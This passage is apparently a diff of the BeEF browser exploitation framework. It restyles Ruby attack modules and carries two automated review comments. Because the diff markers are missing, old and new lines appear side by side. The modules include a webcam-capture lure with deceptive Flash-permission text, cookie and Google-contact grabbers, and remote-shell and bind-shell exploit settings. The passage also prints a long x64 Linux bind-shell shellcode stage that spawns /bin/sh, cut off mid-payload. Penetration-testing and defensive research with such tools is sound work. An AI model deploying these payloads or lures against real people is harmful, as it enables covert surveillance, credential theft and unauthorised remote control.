'name' => 'no_of_pictures',
'description' => 'The number of pictures you want to take after the victim clicked "allow".',
'ui_label' => 'Number of pictures',
'value' => no_of_pictures,
'width' => '100px' }, {
'name' => 'interval',
'description' => 'The interval in which pictures are taken.',
'ui_label' => 'Interval to take pictures (ms)',
'value' => interval,
'width' => '100px' }
]
social_engineering_title = 'This website is using Adobe Flash'
social_engineering_text = 'In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will improve your user experience.'
no_of_pictures = 20
interval = 1000
[
{ 'name' => 'social_engineering_title',
'description' => 'The title that is shown to the victim.',
'ui_label' => 'Social Engineering Title',
'value' => social_engineering_title,
'width' => '100px' }, {
'name' => 'social_engineering_text',
'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
'ui_label' => 'Social Engineering Text',
'value' => social_engineering_text,
'width' => '300px',
'type' => 'textarea'
}, {
'name' => 'no_of_pictures',
'description' => 'The number of pictures you want to take after the victim clicked "allow".',
'ui_label' => 'Number of pictures',
'value' => no_of_pictures,
'width' => '100px'
}, {
'name' => 'interval',
'description' => 'The interval in which pictures are taken.',
'ui_label' => 'Interval to take pictures (ms)',
'value' => interval,
'width' => '100px'
}
]
end
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["picture"] = @datastore["picture"] if not @datastore["picture"].nil?
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
def post_execute
content = {}
content['result'] = @datastore['result'] unless @datastore['result'].nil?
content['picture'] = @datastore['picture'] unless @datastore['picture'].nil?
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end
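Review bot: `require 'base64'` at the top of this file is kept, but nothing in the `Webcam_flash` class shown here calls `Base64`, and the same holds for `Webcam_html5` in the next file section. If no other file relies on these modules to load it, the line can be dropped from both. The `configuration = BeEF::Core::Configuration.instance` local at the top of `self.options` also appears to survive as an unchanged line and is never read in the method; this commit removes the same assignment from other modules.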


@@ -5,12 +5,10 @@
#
require 'base64'
class Webcam_html5 < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["image"] = @datastore["image"] if not @datastore["image"].nil?
save content
end
def post_execute
content = {}
content['result'] = @datastore['result'] unless @datastore['result'].nil?
content['image'] = @datastore['image'] unless @datastore['image'].nil?
save content
end
end


@@ -6,14 +6,12 @@
class Webcam_permission_check < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
end
def post_execute
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
end
def post_execute
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end


@@ -4,11 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Execute_tabs < BeEF::Core::Command
def self.options
return [
{'name' => 'url', 'ui_label' => 'URL', 'value' => 'https://www.google.com/accounts/EditUserInfo', 'width' => '500px'},
{'name' => 'theJS', 'ui_label' => 'Javascript', 'value' => 'prompt(\'BeEF\');', 'type' => 'textarea', 'width' => '400px', 'height' => '300px'}
[
{ 'name' => 'url', 'ui_label' => 'URL', 'value' => 'https://www.google.com/accounts/EditUserInfo', 'width' => '500px' },
{ 'name' => 'theJS', 'ui_label' => 'Javascript', 'value' => 'prompt(\'BeEF\');', 'type' => 'textarea', 'width' => '400px', 'height' => '300px' }
]
end
@@ -17,6 +16,4 @@ class Execute_tabs < BeEF::Core::Command
content['Return'] = @datastore['return']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_all_cookies < BeEF::Core::Command
def self.options
return [
{'name' =>'url', 'ui_label'=>'Domain (e.g. http://facebook.com)', 'value' => 'default_all'}
def self.options
[
{ 'name' => 'url', 'ui_label' => 'Domain (e.g. http://facebook.com)', 'value' => 'default_all' }
]
end
@@ -17,5 +15,4 @@ class Get_all_cookies < BeEF::Core::Command
content['Return'] = @datastore['return']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Grab_google_contacts < BeEF::Core::Command
def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Inject_beef < BeEF::Core::Command
def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Screenshot < BeEF::Core::Command
def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end
end


@@ -4,11 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Send_gvoice_sms < BeEF::Core::Command
def self.options
return [
{'name' => 'to', 'ui_label' => 'To', 'value' => '1234567890', 'type' =>'textarea', 'width' => '300px'},
{'name' => 'message', 'ui_label' => 'Message', 'value' => 'Hello from BeEF', 'type' => 'textarea', 'width' => '300px', 'height' => '200px'}
[
{ 'name' => 'to', 'ui_label' => 'To', 'value' => '1234567890', 'type' => 'textarea', 'width' => '300px' },
{ 'name' => 'message', 'ui_label' => 'Message', 'value' => 'Hello from BeEF', 'type' => 'textarea', 'width' => '300px', 'height' => '200px' }
]
end
@@ -19,5 +18,4 @@ class Send_gvoice_sms < BeEF::Core::Command
content['Status'] = @datastore['status']
save content
end
end


@@ -4,10 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_beef_debug < BeEF::Core::Command
def self.options
return [
{'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
[
{ 'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => 'Test string for beef.debug() function', 'type' => 'textarea',
'width' => '400px', 'height' => '50px' }
]
end
@@ -16,5 +16,4 @@ class Test_beef_debug < BeEF::Core::Command
content['Result'] = @datastore['result']
save content
end
end


@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_cors_request < BeEF::Core::Command
def post_execute
content = {}
content['response'] = @datastore['response']
@@ -12,12 +11,11 @@ class Test_cors_request < BeEF::Core::Command
end
def self.options
return [
{'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{'name' => 'url', 'ui_label' =>'URL', 'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' },
{'name' => 'data', 'ui_label' =>'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' },
[
{ 'name' => 'method', 'ui_label' => 'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{ 'name' => 'url', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px',
'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' },
{ 'name' => 'data', 'ui_label' => 'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' }
]
end
end


@@ -4,23 +4,25 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_dns_tunnel_client < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
@configuration = BeEF::Core::Configuration.instance
return [
{'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => 'browserhacker.com' },
{'name' => 'data', 'ui_label'=>'Data to send', 'type' => 'textarea', 'value' =>
'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras rutrum fermentum nunc, vel varius libero pharetra a. Duis rhoncus nisi volutpat elit suscipit auctor. In fringilla est eget tortor bibendum gravida. Pellentesque aliquet augue libero, at gravida arcu. Nunc et quam sapien, eu pulvinar erat. Quisque dignissim imperdiet neque, et interdum sem sagittis a. Maecenas non mi elit, a luctus neque. Nam pulvinar libero sit amet dui suscipit facilisis. Duis sed mauris elit. Aliquam cursus scelerisque diam a fringilla. Curabitur mollis nisi in ante hendrerit pellentesque ut ac orci. In congue nunc vitae enim pharetra eleifend.',
'width' => '400px', 'height' => '300px'
}
[
{ 'name' => 'domain', 'ui_label' => 'Domain', 'type' => 'text', 'width' => '400px', 'value' => 'browserhacker.com' },
{ 'name' => 'data', 'ui_label' => 'Data to send', 'type' => 'textarea', 'value' =>
'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras rutrum fermentum nunc, vel varius libero pharetra a. ' \
'Duis rhoncus nisi volutpat elit suscipit auctor. In fringilla est eget tortor bibendum gravida. Pellentesque aliquet ' \
'augue libero, at gravida arcu. Nunc et quam sapien, eu pulvinar erat. Quisque dignissim imperdiet neque, et interdum ' \
'sem sagittis a. Maecenas non mi elit, a luctus neque. Nam pulvinar libero sit amet dui suscipit facilisis. Duis sed ' \
'mauris elit. Aliquam cursus scelerisque diam a fringilla. Curabitur mollis nisi in ante hendrerit pellentesque ut ac ' \
'orci. In congue nunc vitae enim pharetra eleifend.',
'width' => '400px', 'height' => '300px' }
]
end
def post_execute
content = {}
content['dns_requests'] = @datastore['dns_requests']
save content
end
end
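Review bot: `@configuration = BeEF::Core::Configuration.instance` in `self.options` is only re-indented here, yet nothing in the visible class reads it, and because it sits in a class method it sets an instance variable on the class object rather than a local. Deleting the line would match what this commit does for the unused `configuration` locals in other modules. `Test_network_request` further down does read the value right after assigning it, where a plain local, `configuration = BeEF::Core::Configuration.instance`, would avoid leaving state on the class; the opening line of that method is outside its hunk.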


@@ -4,9 +4,7 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_get_variable < BeEF::Core::Command
def self.options
return [{'name' => 'payload_name', 'ui_label'=>'Payload Name', 'type' => 'text', 'value' => 'message', 'width' => '400px'}]
[{ 'name' => 'payload_name', 'ui_label' => 'Payload Name', 'type' => 'text', 'value' => 'message', 'width' => '400px' }]
end
end


@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_http_redirect < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect')
end
@@ -14,5 +13,4 @@ class Test_http_redirect < BeEF::Core::Command
content['Result'] = @datastore['result']
save content
end
end


@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_network_request < BeEF::Core::Command
def post_execute
content = {}
content['response'] = @datastore['response']
@@ -15,19 +14,18 @@ class Test_network_request < BeEF::Core::Command
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
hook_path = @configuration.get("beef.http.hook_file")
hook_path = @configuration.get('beef.http.hook_file')
return [
{'name' => 'scheme', 'ui_label'=>'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' },
{'name' => 'method', 'ui_label'=>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host },
{'name' => 'port', 'ui_label'=>'Port', 'type' => 'text', 'width' => '400px', 'value' => beef_port },
{'name' => 'path', 'ui_label'=>'Path', 'type' => 'text', 'width' => '400px', 'value' => hook_path },
{'name' => 'anchor', 'ui_label'=>'Anchor', 'type' => 'text', 'width' => '400px', 'value' => 'irrelevant' },
{'name' => 'data', 'ui_label'=>'Query String', 'type' => 'text', 'width' => '400px', 'value' => 'query=data' },
{'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '10', 'width'=>'400px' },
{'name' => 'dataType', 'ui_label'=>'Data Type', 'type' => 'text', 'width' => '400px', 'value' => 'script' },
[
{ 'name' => 'scheme', 'ui_label' => 'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' },
{ 'name' => 'method', 'ui_label' => 'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{ 'name' => 'domain', 'ui_label' => 'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host },
{ 'name' => 'port', 'ui_label' => 'Port', 'type' => 'text', 'width' => '400px', 'value' => beef_port },
{ 'name' => 'path', 'ui_label' => 'Path', 'type' => 'text', 'width' => '400px', 'value' => hook_path },
{ 'name' => 'anchor', 'ui_label' => 'Anchor', 'type' => 'text', 'width' => '400px', 'value' => 'irrelevant' },
{ 'name' => 'data', 'ui_label' => 'Query String', 'type' => 'text', 'width' => '400px', 'value' => 'query=data' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '10', 'width' => '400px' },
{ 'name' => 'dataType', 'ui_label' => 'Data Type', 'type' => 'text', 'width' => '400px', 'value' => 'script' }
]
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_return_ascii_chars < BeEF::Core::Command
def post_execute
content = {}
content['Result String'] = @datastore['result_string']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_return_image < BeEF::Core::Command
def post_execute
content = {}
content['image'] = @datastore['image']
save content
end
end


@@ -4,19 +4,16 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_return_long_string < BeEF::Core::Command
def self.options
return [
{'name' => 'repeat', 'description' => 'Times to repeat', 'ui_label' => 'Times to repeat', 'value' =>'1024'},
{'name' => 'repeat_string', 'description' => 'Strings to repeat', 'ui_label' => 'String to repeat', 'value' =>'\u00AE'}
[
{ 'name' => 'repeat', 'description' => 'Times to repeat', 'ui_label' => 'Times to repeat', 'value' => '1024' },
{ 'name' => 'repeat_string', 'description' => 'Strings to repeat', 'ui_label' => 'String to repeat', 'value' => '\u00AE' }
]
end
def post_execute
content = {}
content['Result String'] = @datastore['result_string']
save content
end
end


@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Apache_cookies < BeEF::Core::Command
def post_execute
content = {}
content['apache_cookies'] = @datastore['apache_cookies']
save content
end
def post_execute
content = {}
content['apache_cookies'] = @datastore['apache_cookies']
save content
end
end


@@ -4,13 +4,12 @@
# See the file 'doc/COPYING' for copying permission
#
class Apache_felix_remote_shell < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
lhost = '' if lhost == '0.0.0.0'
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6666' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }
@@ -18,7 +17,6 @@ class Apache_felix_remote_shell < BeEF::Core::Command
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end


@@ -4,20 +4,16 @@
# See the file 'doc/COPYING' for copying permission
#
class Active_fax_beef_bind < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '3000'},
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
{ 'name' => 'jmpesp', 'ui_label' => 'JMP ESP', 'value' => '\x77\x9c\x55\x77'}
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '3000' },
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' },
{ 'name' => 'jmpesp', 'ui_label' => 'JMP ESP', 'value' => '\x77\x9c\x55\x77' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end


@@ -4,27 +4,25 @@
# See the file 'doc/COPYING' for copying permission
#
class Eudora_mail_beef_bind < BeEF::Core::Command
def self.options
def self.options
configuration = BeEF::Core::Configuration.instance
beef_host = "#{configuration.get("beef.http.host")}"
beef_port = "#{configuration.get("beef.http.port")}"
beef_host = configuration.get('beef.http.host').to_s
beef_port = configuration.get('beef.http.port').to_s
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'},
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
{ 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'},
{ 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host},
{ 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port},
{ 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'},
{ 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'}
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143' },
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' },
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/' },
{ 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000' },
{ 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host },
{ 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port },
{ 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000' },
{ 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end


@@ -4,22 +4,19 @@
# See the file 'doc/COPYING' for copying permission
#
class Beef_bind_shell < BeEF::Core::Command
def self.options
return [
{ 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' },
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/' },
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname' },
{ 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
'store_fields' => ['shellcode'], 'store_data' => [['Windows'], ['Linux']],
'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end


@@ -3,71 +3,65 @@
##
module Msf
module Handler
module Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeefBind
include Msf::Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeefBind
#
# Returns the handler specific string representation
#
def self.handler_type
'beef_bind'
end
include Msf::Handler
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
'bind'
end
#
# Returns the handler specific string representation
#
def self.handler_type
return "beef_bind"
end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444)
# OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeefBind
)
end
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
"bind"
end
#
# Placeholder only
#
def cleanup_handler; end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444),
#OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeefBind)
end
#
# Placeholder only
#
def add_handler(_opts = {})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def cleanup_handler
end
#
# Placeholder only
#
def add_handler(opts={})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def start_handler
end
#
# Placeholder only
#
def stop_handler
end
#
# Placeholder only
#
def start_handler; end
end
end
#
# Placeholder only
#
def stop_handler; end
end
end
end


@@ -10,76 +10,73 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [165, 'n']
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" \
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" \
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" \
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" \
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" \
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" \
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" \
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" \
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" \
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" \
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" \
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" \
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" \
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" \
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" \
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" \
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" \
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" \
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" \
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" \
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" \
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" \
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" \
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" \
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" \
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" \
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" \
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" \
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" \
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" \
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" \
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" \
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" \
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" \
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" \
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" \
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" \
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" \
"\xf6\x48\x31\xd2\x0f\x05"
}))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 165, 'n' ]
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
